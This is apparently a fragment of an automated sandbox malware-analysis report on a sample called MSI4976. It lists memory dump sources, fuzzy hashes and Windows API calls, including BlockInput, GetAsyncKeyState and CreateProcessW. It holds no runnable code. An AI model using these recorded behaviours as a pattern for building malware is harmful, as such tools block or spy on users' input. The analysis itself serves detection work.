                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6185fb346d98807f7c979cd5ad5473beba7da1075082a70b350a895c84ba701b
                                        • Instruction ID: 0375f62b2ee0a7ad48df1a901161b0c6a17b2a74226dc37bb59a9b6905b28bda
                                        • Opcode Fuzzy Hash: 6185fb346d98807f7c979cd5ad5473beba7da1075082a70b350a895c84ba701b
                                        • Instruction Fuzzy Hash: FCB1E320E2AF514DD723A6398831336B65CAFBB3D9F91D71BFD1A74D62EB2185834180
                                        APIs
                                          • Part of subcall function 0033AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0033AF8E
                                        • NtdllDialogWndProc_W.NTDLL(?,00000112,?,?), ref: 00390352
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: DialogLongNtdllProc_Window
                                        • String ID:
                                        • API String ID: 2065330234-0
                                        • Opcode ID: 907aafb1bd32cb471acf3096ca2beaee4738292796d5acfddaec8c155eb5595b
                                        • Instruction ID: 6604a28c6d4ab28836358168d7ad68cd66651a1109f6cc5215f000c1d7a1709d
                                        • Opcode Fuzzy Hash: 907aafb1bd32cb471acf3096ca2beaee4738292796d5acfddaec8c155eb5595b
                                        • Instruction Fuzzy Hash: 48112335204265AFEF2B6F2CCC85F7D3B68EB41760F644314F9125E5E2CA708D00D2A9
                                        APIs
                                          • Part of subcall function 0033B155: GetWindowLongW.USER32(?,000000EB), ref: 0033B166
                                        • CallWindowProcW.USER32(?,?,00000020,?,?), ref: 0038E7AF
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Window$CallLongProc
                                        • String ID:
                                        • API String ID: 4084987330-0
                                        • Opcode ID: 7e92c19691a8bb91bb342a1066c8c1d8d3d2e6ad281c801b5067d304525b0f14
                                        • Instruction ID: f54dd74f17c6481faf40fdaff71d84e8189d31058828042f2924a882f1e30a18
                                        • Opcode Fuzzy Hash: 7e92c19691a8bb91bb342a1066c8c1d8d3d2e6ad281c801b5067d304525b0f14
                                        • Instruction Fuzzy Hash: 9FF0FF35204208EFCF06AF54DC44DB93BAAEB05360F044554FD158A6A1D7329D60EB50
                                        APIs
                                          • Part of subcall function 0033AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0033AF8E
                                          • Part of subcall function 0033B736: GetCursorPos.USER32(000000FF), ref: 0033B749
                                          • Part of subcall function 0033B736: ScreenToClient.USER32(00000000,000000FF), ref: 0033B766
                                          • Part of subcall function 0033B736: GetAsyncKeyState.USER32(00000001), ref: 0033B78B
                                          • Part of subcall function 0033B736: GetAsyncKeyState.USER32(00000002), ref: 0033B799
                                        • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,0039F417,?,?,?,?,?,00000001,?), ref: 0038EA9C
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                                        • String ID:
                                        • API String ID: 2356834413-0
                                        • Opcode ID: d19611a002737a7077294a0c07cf9bb62e484923d57cf09c636ecb8efdfa595f
                                        • Instruction ID: b4edf4eb765c22388782211229df85b54901540da3473566a2a7d1b835acd3fa
                                        • Opcode Fuzzy Hash: d19611a002737a7077294a0c07cf9bb62e484923d57cf09c636ecb8efdfa595f
                                        • Instruction Fuzzy Hash: 99F08C31200229ABDB16AF19CC4AABE3BA5FB01B90F044015F91A1E1A1D77A9861DBE1
                                        APIs
                                          • Part of subcall function 0033AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0033AF8E
                                        • NtdllDialogWndProc_W.NTDLL(?,00000006,?,?,?,?,0033AF40,?,?,?,?,?), ref: 0033B83B
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: DialogLongNtdllProc_Window
                                        • String ID:
                                        • API String ID: 2065330234-0
                                        • Opcode ID: a54619512ac6836d79e16bcf274353bdee7845620bd443a84951f8bad8026063
                                        • Instruction ID: ec394ab4381296747be4e6b6313413acb611d52bf1c3c4b75f581d0a680a496d
                                        • Opcode Fuzzy Hash: a54619512ac6836d79e16bcf274353bdee7845620bd443a84951f8bad8026063
                                        • Instruction Fuzzy Hash: 51F05E306002599FDF1A9F15D8D19393BAAFB05360F144329F9528F2E1D771D850DB50
                                        APIs
                                        • BlockInput.USER32(00000001), ref: 00377057
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: BlockInput
                                        • String ID:
                                        • API String ID: 3456056419-0
                                        • Opcode ID: dc7a4972f490009e1372d4ca212d7e3a62e77c5c3d7307638f764c904e620adf
                                        • Instruction ID: 4396cc0028b5a3ef92d089dd55ed14b0f9f644ff68ad59fb183afcdaf8645355
                                        • Opcode Fuzzy Hash: dc7a4972f490009e1372d4ca212d7e3a62e77c5c3d7307638f764c904e620adf
                                        • Instruction Fuzzy Hash: 7BE048763142145FD711DF69D408D96F7DC9F55750F01C426F949D7251DAB4E9008B90
                                        APIs
                                        • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 0038F41A
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: DialogNtdllProc_
                                        • String ID:
                                        • API String ID: 3239928679-0
                                        • Opcode ID: 85ca7c0eb7db713f39c1996161d0625f849a01401b049e2d50a7d08635986ccb
                                        • Instruction ID: 191a238029ee0a471b897e26379be741184923b1c621d5c35e47eaccc83edde6
                                        • Opcode Fuzzy Hash: 85ca7c0eb7db713f39c1996161d0625f849a01401b049e2d50a7d08635986ccb
                                        • Instruction Fuzzy Hash: 7EF06D32200399AFDB22EF58DC45FC67BA9FB06360F044559FA116B2E1CB706820D764
                                        APIs
                                          • Part of subcall function 0033AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0033AF8E
                                        • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 0033ACC7
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: DialogLongNtdllProc_Window
                                        • String ID:
                                        • API String ID: 2065330234-0
                                        • Opcode ID: 9eb65f59f70db4ccc873bfed04cf60924e8e902bd4afbbd91b2f83b9e650193a
                                        • Instruction ID: 1a5e10c9cb5f9967f4500e5099db4763dfd6ab535c41056fc10850b19f27293f
                                        • Opcode Fuzzy Hash: 9eb65f59f70db4ccc873bfed04cf60924e8e902bd4afbbd91b2f83b9e650193a
                                        • Instruction Fuzzy Hash: 9CE01235600208FBCF16AF90DC91E683B2AFF49394F108518F6464F6E1CB33A522EB51
                                        APIs
                                        • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,0039F3D4,?,?,?,?,?,?), ref: 0038F450
                                          • Part of subcall function 0038E13E: _memset.LIBCMT ref: 0038E14D
                                          • Part of subcall function 0038E13E: _memset.LIBCMT ref: 0038E15C
                                          • Part of subcall function 0038E13E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,003E3EE0,003E3F24), ref: 0038E18B
                                          • Part of subcall function 0038E13E: CloseHandle.KERNEL32 ref: 0038E19D
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                        • String ID:
                                        • API String ID: 2364484715-0
                                        • Opcode ID: 0b843b464d23d5e9901e7fa6e4614bf92feb40aa58e39610dd6e019cd72c7a53
                                        • Instruction ID: ba123c02901551033af6e4b04da2958e9ee3df7a0709ad6b9b018b377475f268
                                        • Opcode Fuzzy Hash: 0b843b464d23d5e9901e7fa6e4614bf92feb40aa58e39610dd6e019cd72c7a53
                                        • Instruction Fuzzy Hash: F1E04632100308DFCB12EF08DC44E9A37AAFB09340F018091FA015B2B1C731A920EF40
                                        APIs
                                        • NtdllDialogWndProc_W.NTDLL ref: 0038F3A1
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: DialogNtdllProc_
                                        • String ID:
                                        • API String ID: 3239928679-0
                                        • Opcode ID: 817873d52c90054c3646b6f9a5e76eedaa521b8b89708d1c4f1a0f493a820b21
                                        • Instruction ID: 97cea25caed394ae1eff75006dfa18b0e16fcc6b7f9039f3ad1ed1abad125543
                                        • Opcode Fuzzy Hash: 817873d52c90054c3646b6f9a5e76eedaa521b8b89708d1c4f1a0f493a820b21
                                        • Instruction Fuzzy Hash: 25E0173520424CEFCB02DF88DC84E8A3BA9FB1A350F040054FD058B361C771A830DB61
                                        APIs
                                        • NtdllDialogWndProc_W.NTDLL ref: 0038F3D0
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: DialogNtdllProc_
                                        • String ID:
                                        • API String ID: 3239928679-0
                                        • Opcode ID: 33534dcdf8d09bb13f66d9a530805e44270d9edfb814c8f7e83d4a2304a54c2c
                                        • Instruction ID: 4676c50fc0a13139f01f922138f7cef23686af9371902f7327c8d3470cb2d8fe
                                        • Opcode Fuzzy Hash: 33534dcdf8d09bb13f66d9a530805e44270d9edfb814c8f7e83d4a2304a54c2c
                                        • Instruction Fuzzy Hash: 24E0173520024CEFCB02DF88D884E8A3BA9FB1A350F040054FD058B362C772A830EBA1
                                        APIs
                                          • Part of subcall function 0033AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0033AF8E
                                          • Part of subcall function 0033B86E: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0033B85B), ref: 0033B926
                                          • Part of subcall function 0033B86E: KillTimer.USER32(00000000,?,00000000,?,?,?,?,0033B85B,00000000,?,?,0033AF1E,?,?), ref: 0033B9BD
                                        • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,0033AF1E,?,?), ref: 0033B864
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                        • String ID:
                                        • API String ID: 2797419724-0
                                        • Opcode ID: ed661e89de3d873028a477bfb164b70b2fb863c7c2b80bd7bdeb0cfc503e5da4
                                        • Instruction ID: 5a306df4fcdd6ab7ba4f93c6fe52ec31262dbb304bd1b07791ba07df6350ff6f
                                        • Opcode Fuzzy Hash: ed661e89de3d873028a477bfb164b70b2fb863c7c2b80bd7bdeb0cfc503e5da4
                                        • Instruction Fuzzy Hash: E1D0127124430C77DB122B61DC07F4D7A1DAF01791F408420F7056D1E1CB7264109555
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00348E1F
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        • Opcode ID: 8a0648e3a9207c92ef0c35de64d9b475756fb0cef821aa17f9cd2d5e6011edb6
                                        • Instruction ID: 1bdccd5088224b57c88283b0f3e99f23254b589726b3dd1c60dce42b5ee7dbb0
                                        • Opcode Fuzzy Hash: 8a0648e3a9207c92ef0c35de64d9b475756fb0cef821aa17f9cd2d5e6011edb6
                                        • Instruction Fuzzy Hash: D3A0123000050CA78E011B51EC044447F5CD606250B004010F40D00421873354104981
                                        APIs
                                        • GetProcessHeap.KERNEL32(00346AE9,003D67D8,00000014), ref: 0034A937
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: HeapProcess
                                        • String ID:
                                        • API String ID: 54951025-0
                                        • Opcode ID: 23821cdf46838ac84ed4de57b11dd6f26d1e9c93ea479c9885ac4a9cc31580c8
                                        • Instruction ID: 330149fbdc2c6a6bf2281f5403ed76a974050f4c2cbda29dea792e35565461e0
                                        • Opcode Fuzzy Hash: 23821cdf46838ac84ed4de57b11dd6f26d1e9c93ea479c9885ac4a9cc31580c8
                                        • Instruction Fuzzy Hash: A1B012B03031024BD74D4F38AC9411A39DC974A301701403D7003C69B1DB349450DF00
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                        • Instruction ID: 49ff7af529cbe74261c4634477873cfd256d86ad8813c04bcc9a7001c77d84a0
                                        • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                        • Instruction Fuzzy Hash: 03C1907330559349DF6E463A847483EBBE15AA27B131B076DD8B3CF4C4EE24E5A8D620
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                        • Instruction ID: 28f03a24d91a8ef3320699fee80313d241c215ea9f151d46e6beebd15abe20c6
                                        • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                        • Instruction Fuzzy Hash: 72C1F3732055934ADF2F463AC47483EBAE15AA27B131B07ADD8B3CF5C4EE24E564D620
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                        • Instruction ID: 07cc71b7ae80d0c844a20bb0e114face40d3ee2d21b91ddf48716b6ee2dd0412
                                        • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                        • Instruction Fuzzy Hash: 98C1B1733052934ADF2F463A847483EBAE19AA27B531B076DD5B2CF4D0EE34E564D620
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
